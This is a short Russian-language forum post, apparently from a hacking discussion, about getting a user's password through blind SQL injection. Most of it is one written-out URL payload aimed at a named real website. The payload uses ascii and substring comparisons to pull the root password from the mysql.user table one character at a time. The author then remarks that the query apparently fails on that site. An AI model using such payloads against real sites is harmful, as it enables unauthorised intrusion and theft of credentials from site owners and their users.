теоритически можно узнать пароль юзера зная его логин. Так же нужно знать имя базы данных, таблицу и название колонки с паролем

вот пример

http://www.mykidsfair.com/?dept=62&pid=66+AND+ascii(lower(substring((select+ password+from+mysql.user+WHERE+user=char(114,111,1 11,116)+LIMIT+1),1,1)))>1

пароль берется из таблицы user находящ в базе mysql
Но сдесь базы mysql походу нет, и запрос соответственно не верный